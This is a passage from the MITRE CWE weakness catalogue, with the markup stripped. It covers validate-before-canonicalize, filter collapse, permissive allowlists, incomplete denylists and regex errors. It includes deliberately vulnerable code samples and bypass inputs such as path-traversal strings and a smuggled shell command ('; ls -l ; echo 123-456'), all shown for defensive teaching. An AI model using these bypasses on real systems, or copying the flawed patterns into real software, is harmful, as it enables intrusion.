+ + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + These errors are mostly reported in path traversal vulnerabilities, but the concept applies whenever validation occurs. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Research_Gaps + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Early Validation Errors + + + + The product validates input before it is canonicalized, which prevents the product from detecting data that becomes invalid after the canonicalization step. + This can be used by an attacker to bypass the validation and launch attacks that expose weaknesses that would otherwise be prevented, such as injection. + + + + + + + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + The following code attempts to validate a given input path by checking it against an allowlist and then return the canonical path. In this specific case, the path is considered valid if it starts with the string "/safe_dir/". + + String path = getInputPath();if (path.startsWith("/safe_dir/")){File f = new File(path);return f.getCanonicalPath();} + + The problem with the above code is that the validation step occurs before canonicalization occurs. An attacker could provide an input path of "/safe_dir/../" that would pass the validation step. However, the canonicalization process sees the double dot as a traversal to the parent directory and hence when canonicized the path would become just "/". + To avoid this problem, validation should occur after canonicalization takes place. In this case canonicalization occurs during the initialization of the File object. The code below fixes the issue. + + String path = getInputPath();File f = new File(path);if (f.getCanonicalPath().startsWith("/safe_dir/")){return f.getCanonicalPath();} + + + + + + + + CVE-2002-0433 + Product allows remote attackers to view restricted files via an HTTP request containing a "*" (wildcard or asterisk) character. + https://www.cve.org/CVERecord?id=CVE-2002-0433 + + + CVE-2003-0332 + Product modifies the first two letters of a filename extension after performing a security check, which allows remote attackers to bypass authentication via a filename with a .ats extension instead of a .hts extension. + https://www.cve.org/CVERecord?id=CVE-2003-0332 + + + CVE-2002-0802 + Database consumes an extra character when processing a character that cannot be converted, which could remove an escape character from the query and make the application subject to SQL injection attacks. + https://www.cve.org/CVERecord?id=CVE-2002-0802 + + + CVE-2000-0191 + Overlaps "fakechild/../realchild" + https://www.cve.org/CVERecord?id=CVE-2000-0191 + + + CVE-2004-2363 + Product checks URI for "<" and other literal characters, but does it before hex decoding the URI, so "%3E" and other sequences are allowed. + https://www.cve.org/CVERecord?id=CVE-2004-2363 + + + + + Validate-Before-Canonicalize + + + A1 + Unvalidated Input + CWE More Specific + + + IDS01-J + Normalize strings before validating them + Exact + + + IDS01-J + Normalize strings before validating them + Exact + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This overlaps other categories. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Functional_Areas + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Validate-Before-Canonicalize + + + + The product validates data before it has been filtered, which prevents the product from detecting data that becomes invalid after the filtering step. + This can be used by an attacker to bypass the validation and launch attacks that expose weaknesses that would otherwise be prevented, such as injection. + + + + + + + + + Validate-before-cleanse + + + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Implementation + Architecture and Design + Inputs should be decoded and canonicalized to the application's current internal representation before being filtered. + + + + + This script creates a subdirectory within a user directory and sets the user as the owner. + + function createDir($userName,$dirName){$userDir = '/users/'. $userName;if(strpos($dirName,'..') !== false){echo 'Directory name contains invalid sequence';return;} + //filter out '~' because other scripts identify user directories by this prefix + $dirName = str_replace('~','',$dirName);$newDir = $userDir . $dirName;mkdir($newDir, 0700);chown($newDir,$userName);} + + While the script attempts to screen for '..' sequences, an attacker can submit a directory path including ".~.", which will then become ".." after the filtering step. This allows a Path Traversal (CWE-21) attack to occur. + + + + + CVE-2002-0934 + Directory traversal vulnerability allows remote attackers to read or modify arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a ".." sequence. + https://www.cve.org/CVERecord?id=CVE-2002-0934 + + + CVE-2003-0282 + Directory traversal vulnerability allows attackers to overwrite arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a ".." sequence. + https://www.cve.org/CVERecord?id=CVE-2003-0282 + + + + Protection Mechanism + + + + Validate-Before-Filter + + + A1 + Unvalidated Input + CWE More Specific + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This category is probably under-studied. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Functional_Areas, Relationships, Research_Gaps, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Observed_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Validate-before-filter + + + + The product filters data in a way that causes it to be reduced or "collapsed" into an unsafe value that violates an expected security property. + + + + + + + + + + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Input Validation + Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + Canonicalize the name to match that of the file system's representation of the name. This can sometimes be achieved with an available API (e.g. in Win32 the GetFullPathName function). + + + + + CVE-2004-0815 + "/.////" in pathname collapses to absolute path. + https://www.cve.org/CVERecord?id=CVE-2004-0815 + + + CVE-2005-3123 + "/.//..//////././" is collapsed into "/.././" after ".." and "//" sequences are removed. + https://www.cve.org/CVERecord?id=CVE-2005-3123 + + + CVE-2002-0325 + ".../...//" collapsed to "..." due to removal of "./" in web server. + https://www.cve.org/CVERecord?id=CVE-2002-0325 + + + CVE-2002-0784 + chain: HTTP server protects against ".." but allows "." variants such as "////./../.../". If the server removes "/.." sequences, the result would collapse into an unsafe value "////../" (CWE-182). + https://www.cve.org/CVERecord?id=CVE-2002-0784 + + + CVE-2005-2169 + MFV. Regular expression intended to protect against directory traversal reduces ".../...//" to "../". + https://www.cve.org/CVERecord?id=CVE-2005-2169 + + + CVE-2001-1157 + XSS protection mechanism strips a <script> sequence that is nested in another <script> sequence. + https://www.cve.org/CVERecord?id=CVE-2001-1157 + + + + + Collapse of Data into Unsafe Value + + + IDS11-J + Eliminate noncharacter code points before validation + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Overlaps regular expressions, although an implementation might not necessarily use regexp's. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Observed_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relevant_Properties + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses. + + + + + + + Primary + + + + + + + + Allowlist / Allow List + This is used by CWE and CAPEC instead of other commonly-used terms. Its counterpart is denylist. + + + Safelist / Safe List + This is often used by security tools such as firewalls, email or web gateways, proxies, etc. + + + Whitelist / White List + This term is frequently used, but usage has been declining as organizations have started to adopt other terms. + + + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + CVE-2019-12799 + chain: bypass of untrusted deserialization issue (CWE-502) by using an assumed-trusted class (CWE-183) + https://www.cve.org/CVERecord?id=CVE-2019-12799 + + + CVE-2019-10458 + sandbox bypass using a method that is on an allowlist + https://www.cve.org/CVERecord?id=CVE-2019-10458 + + + CVE-2017-1000095 + sandbox bypass using unsafe methods that are on an allowlist + https://www.cve.org/CVERecord?id=CVE-2017-1000095 + + + CVE-2019-10458 + CI/CD pipeline feature has unsafe elements in allowlist, allowing bypass of script restrictions + https://www.cve.org/CVERecord?id=CVE-2019-10458 + + + CVE-2017-1000095 + Default allowlist includes unsafe methods, allowing bypass of sandbox + https://www.cve.org/CVERecord?id=CVE-2017-1000095 + + + + + Permissive Whitelist + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Alternate_Terms, Description, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Alternate_Terms, Observed_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Permissive Whitelist + + + + The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete, leading to resultant weaknesses. + Developers often try to protect their products against malicious input by performing tests against inputs that are known to be bad, such as special characters that can invoke new commands. However, such lists often only account for the most well-known bad inputs. Attackers may be able to find other malicious inputs that were not expected by the developer, allowing them to bypass the intended protection mechanism. + + + + + + + + + + + Primary + + + + + + + + Denylist / Deny List + This is used by CWE and CAPEC instead of other commonly-used terms. Its counterpart is allowlist. + + + Blocklist / Block List + This is often used by security tools such as firewalls, email or web gateways, proxies, etc. + + + Blacklist / Black List + This term is frequently used, but usage has been declining as organizations have started to adopt other terms. + + + + + Implementation + Developers might begin to develop a list of bad inputs as a fast way to fix a particular weakness, instead of fixing the root cause. See [REF-141]. + + + Architecture and Design + The design might rely solely on detection of malicious inputs as a protection mechanism. + + + + + Access Control + Bypass Protection Mechanism + + + + + Black Box + Exploitation of a vulnerability with commonly-used manipulations might fail, but minor variations might succeed. + + + + + Implementation + Input Validation + Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs. + + + + + The following code attempts to stop XSS attacks by removing all occurences of "script" in an input string. + + public String removeScriptTags(String input, String mask) {return input.replaceAll("script", mask);} + + Because the code only checks for the lower-case "script" string, it can be easily defeated with upper-case script tags. + + + + + CVE-2008-2309 + product uses a denylist to identify potentially dangerous content, allowing attacker to bypass a warning + https://www.cve.org/CVERecord?id=CVE-2008-2309 + + + CVE-2005-2782 + PHP remote file inclusion in web application that filters "http" and "https" URLs, but not "ftp". + https://www.cve.org/CVERecord?id=CVE-2005-2782 + + + CVE-2004-0542 + Programming language does not filter certain shell metacharacters in Windows environment. + https://www.cve.org/CVERecord?id=CVE-2004-0542 + + + CVE-2004-0595 + XSS filter doesn't filter null characters before looking for dangerous tags, which are ignored by web browsers. MIE and validate-before-cleanse. + https://www.cve.org/CVERecord?id=CVE-2004-0595 + + + CVE-2005-3287 + Web-based mail product doesn't restrict dangerous extensions such as ASPX on a web server, even though others are prohibited. + https://www.cve.org/CVERecord?id=CVE-2005-3287 + + + CVE-2004-2351 + Resultant XSS when only <script> and <style> are checked. + https://www.cve.org/CVERecord?id=CVE-2004-2351 + + + CVE-2005-2959 + Privileged program does not clear sensitive environment variables that are used by bash. Overlaps multiple interpretation error. + https://www.cve.org/CVERecord?id=CVE-2005-2959 + + + CVE-2005-1824 + SQL injection protection scheme does not quote the "\" special character. + https://www.cve.org/CVERecord?id=CVE-2005-1824 + + + CVE-2005-2184 + Detection of risky filename extensions prevents users from automatically executing .EXE files, but .LNK is accepted, allowing resultant Windows symbolic link. + https://www.cve.org/CVERecord?id=CVE-2005-2184 + + + CVE-2007-1343 + Product uses list of protected variables, but accidentally omits one dangerous variable, allowing external modification + https://www.cve.org/CVERecord?id=CVE-2007-1343 + + + CVE-2007-5727 + Chain: product only removes SCRIPT tags (CWE-184), enabling XSS (CWE-79) + https://www.cve.org/CVERecord?id=CVE-2007-5727 + + + CVE-2006-4308 + Chain: product only checks for use of "javascript:" tag (CWE-184), allowing XSS (CWE-79) using other tags + https://www.cve.org/CVERecord?id=CVE-2006-4308 + + + CVE-2007-3572 + Chain: OS command injection (CWE-78) enabled by using an unexpected character that is not explicitly disallowed (CWE-184) + https://www.cve.org/CVERecord?id=CVE-2007-3572 + + + CVE-2002-0661 + "\" not in list of disallowed values for web server, allowing path traversal attacks when the server is run on Windows and other OSes. + https://www.cve.org/CVERecord?id=CVE-2002-0661 + + + + + Incomplete Blacklist + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Multiple interpretation errors can indirectly introduce inputs that should be disallowed. For example, a list of dangerous shell metacharacters might not include a metacharacter that only has meaning in one particular shell, not all of them; or a check for XSS manipulations might ignore an unusual construct that is supported by one web browser, but not others. + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Detection_Factors, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Other_Notes, Relationship_Notes, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References + + + CWE Content Team + MITRE + 2018-03-27 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Alternate_Terms, Description, Detection_Factors, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Alternate_Terms, Observed_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Incomplete Blacklist + + + + The product specifies a regular expression in a way that causes data to be improperly matched or compared. + When the regular expression is used in protection mechanisms such as filtering or validation, this may allow an attacker to bypass the intended restrictions on the incoming data. + + + + + + + + + + + Implementation + + + + + Other + Unexpected State + Varies by Context + When the regular expression is not correctly specified, data might have a different format or type than the rest of the program expects, producing resultant weaknesses or errors. + + + Access Control + Bypass Protection Mechanism + In PHP, regular expression checks can sometimes be bypassed with a null byte, leading to any number of weaknesses. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Refactoring + Regular expressions can become error prone when defining a complex language even for those experienced in writing grammars. Determine if several smaller regular expressions simplify one large regular expression. Also, subject the regular expression to thorough testing techniques such as equivalence partitioning, boundary value analysis, and robustness. After testing and a reasonable confidence level is achieved, a regular expression may not be foolproof. If an exploit is allowed to slip through, then record the exploit and refactor the regular expression. + + + + + The following code takes phone numbers as input, and uses a regular expression to reject invalid phone numbers. + + $phone = GetPhoneNumber();if ($phone =~ /\d+-\d+/) { + # looks like it only has hyphens and digits + system("lookup-phone $phone");} + else {error("malformed number!");} + + An attacker could provide an argument such as: "; ls -l ; echo 123-456" This would pass the check, since "123-456" is sufficient to match the "\d+-\d+" portion of the regular expression. + + + This code uses a regular expression to validate an IP string prior to using it in a call to the "ping" command. + + + import subprocess + import re + + def validate_ip_regex(ip: str): + + ip_validator = re.compile(r"((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}") + if ip_validator.match(ip): + + return ip + + else: + + raise ValueError("IP address does not match valid pattern.") + + + + def run_ping_regex(ip: str): + + validated = validate_ip_regex(ip) + # The ping command treats zero-prepended IP addresses as octal + result = subprocess.call(["ping", validated]) + print(result) + + + + Since the regular expression does not have anchors (CWE-777), i.e. is unbounded without ^ or $ characters, then prepending a 0 or 0x to the beginning of the IP address will still result in a matched regex pattern. Since the ping command supports octal and hex prepended IP addresses, it will use the unexpectedly valid IP address (CWE-1389). For example, "0x63.63.63.63" would be considered equivalent to "99.63.63.63". As a result, the attacker could potentially ping systems that the attacker cannot reach directly. + + + + + CVE-2002-2109 + Regexp isn't "anchored" to the beginning or end, which allows spoofed values that have trusted values as substrings. + https://www.cve.org/CVERecord?id=CVE-2002-2109 + + + CVE-2005-1949 + Regexp for IP address isn't anchored at the end, allowing appending of shell metacharacters. + https://www.cve.org/CVERecord?id=CVE-2005-1949 + + + CVE-2001-1072 + Bypass access restrictions via multiple leading slash, which causes a regular expression to fail. + https://www.cve.org/CVERecord?id=CVE-2001-1072 + + + CVE-2000-0115 + Local user DoS via invalid regular expressions. + https://www.cve.org/CVERecord?id=CVE-2000-0115 + + + CVE-2002-1527 + chain: Malformed input generates a regular expression error that leads to information exposure. + https://www.cve.org/CVERecord?id=CVE-2002-1527 + + + CVE-2005-1061 + Certain strings are later used in a regexp, leading to a resultant crash. + https://www.cve.org/CVERecord?id=CVE-2005-1061 + + + CVE-2005-2169 + MFV. Regular expression intended to protect against directory traversal reduces ".../...//" to "../". + https://www.cve.org/CVERecord?id=CVE-2005-2169 + + + CVE-2005-0603 + Malformed regexp syntax leads to information exposure in error message. + https://www.cve.org/CVERecord?id=CVE-2005-0603 + + + CVE-2005-1820 + Code injection due to improper quoting of regular expression. + https://www.cve.org/CVERecord?id=CVE-2005-1820 + + + CVE-2005-3153 + Null byte bypasses PHP regexp check. + https://www.cve.org/CVERecord?id=CVE-2005-3153 + + + CVE-2005-4155 + Null byte bypasses PHP regexp check. + https://www.cve.org/CVERecord?id=CVE-2005-4155 + + + + + Regular Expression Error + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + While there is some overlap with allowlist/denylist problems, this entry is intended to deal with incorrectly written regular expressions, regardless of their intended use. Not every regular expression is intended for use as an allowlist or denylist. In addition, allowlists and denylists can be implemented using other mechanisms besides regular expressions. + Regexp errors are likely a primary factor in many MFVs, especially those that require multiple manipulations to exploit. However, they are rarely diagnosed at this level of detail. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Name, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2010-04-05 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Applicable_Platforms, Common_Consequences, Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationship_Notes + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Regular Expression Error + + + + A regular expression is overly restrictive, which prevents dangerous values from being detected. + This weakness is not about regular expression complexity. Rather, it is about a regular expression that does not match all values that are intended. Consider the use of a regexp to identify acceptable values or to spot unwanted terms. An overly restrictive regexp misses some potentially security-relevant values leading to either false positives *or* false negatives, depending on how the regexp is being used within the code. Consider the expression /[0-8]/ where the intention was /[0-9]/. This expression is not "complex" but the value "9" is not matched when maybe the programmer planned to check for it. + + + + + + + + + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Implementation + Regular expressions can become error prone when defining a complex language even for those experienced in writing grammars. Determine if several smaller regular expressions simplify one large regular expression. Also, subject your regular expression to thorough testing techniques such as equivalence partitioning, boundary value analysis, and robustness. After testing and a reasonable 